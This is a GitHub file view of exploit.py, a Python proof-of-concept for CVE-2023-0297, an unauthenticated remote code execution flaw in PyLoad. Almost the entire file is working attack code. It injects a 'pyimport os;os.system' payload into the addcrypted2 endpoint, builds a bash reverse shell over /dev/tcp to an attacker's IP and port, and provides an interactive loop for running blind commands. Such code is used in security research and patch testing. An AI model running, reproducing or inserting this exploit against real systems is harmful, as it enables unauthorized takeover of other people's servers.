-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathexploit.py
106 lines (81 loc) · 3.93 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
# Exploit Title: PyLoad - Unauthenticated Remote Code Execution
# Date: 21-05-2023
# Exploit Author: Jacob Ebben
# Version: PyLoad < 0.5.0b3.dev31
# CVE: CVE-2023-0297
#!/usr/bin/env python3
import argparse
import requests
import urllib3
import string
import json
from termcolor import colored
from random import choice
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def print_message(message, type):
if type == 'SUCCESS':
print('[' + colored('SUCCESS', 'green') + '] ' + message)
elif type == 'INFO':
print('[' + colored('INFO', 'blue') + '] ' + message)
elif type == 'WARNING':
print('[' + colored('WARNING', 'yellow') + '] ' + message)
elif type == 'ALERT':
print('[' + colored('ALERT', 'yellow') + '] ' + message)
elif type == 'ERROR':
print('[' + colored('ERROR', 'red') + '] ' + message)
class POC:
def __init__(self, target, proxy):
self.base_url = self._get_normalized_url(target)
self.proxies = self._get_proxies(self.base_url, proxy) if proxy else {}
self.session = requests.Session()
def execute_command(self, command):
url = self.base_url + "flash/addcrypted2"
payload = f"pyimport os;os.system(\"{command}\");f=function f2(){{}};"
data = {
"jk": payload,
"packages": self._random_string(8),
"crypted": self._random_string(8),
"passwords": self._random_string(8),
}
response = requests.post(url, data=data, proxies=self.proxies)
def _random_string(self, length=16):
return ''.join(choice(f"{string.ascii_letters}") for i in range(length))
def _get_normalized_url(self, url):
if url[-1] != '/':
url += '/'
if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
url = "http://" + url
return url
def _get_proxies(self, target_url, proxy_url):
return {self._get_url_protocol(target_url): self._get_normalized_url(proxy_url)}
def _get_url_protocol(self, url):
if url[0:8].lower() == 'https://':
return 'https'
return 'http'
def main():
parser = argparse.ArgumentParser(description="PyLoad - Unauthenticated Remote Code Execution")
parser.add_argument('-t', '--target', required=True, type=str, help="url of the vulnerable site (Example: \"http://127.0.0.1:8000/\" or \"https://pyload.example.xyz/py/\")"),
parser.add_argument('-c','--command', default=None, type=str, help='bash command to execute for single command mode (Default: Disabled)'),
parser.add_argument('-I','--atk-ip', default=None, type=str, help='ip address for automatic reverse shell (Default: Disabled)'),
parser.add_argument('-P','--atk-port', default=None, type=str, help='port for automatic reverse shell (Default: Disabled)'),
parser.add_argument('-x','--proxy', default=None, type=str, help='http proxy address (Example: http://127.0.0.1:8080/)')
args = parser.parse_args()
exploit = POC(args.target, args.proxy)
if args.atk_ip and args.atk_port:
print_message('Running reverse shell. Check your listener!', "SUCCESS")
reverse_shell = f"/bin/bash -c 'exec /bin/bash -i &>/dev/tcp/{args.atk_ip}/{args.atk_port} <&1'"
exploit.execute_command(reverse_shell)
elif args.command:
print_message(f'Running your command: "{args.command}"!', "SUCCESS")
print_message('This is a blind RCE, so the results of your command will not be shown', "INFO")
exploit.execute_command(args.command)
else:
print_message('Please enter your command below!', "SUCCESS")
print_message('This is a blind RCE, so the results of your command will not be shown', "INFO")
while True:
command = input(colored('>> ', 'green'))
if command in {'q','exit','quit','exit()','quit()'}:
exit()
exploit.execute_command(command)
if __name__ == "__main__":
main()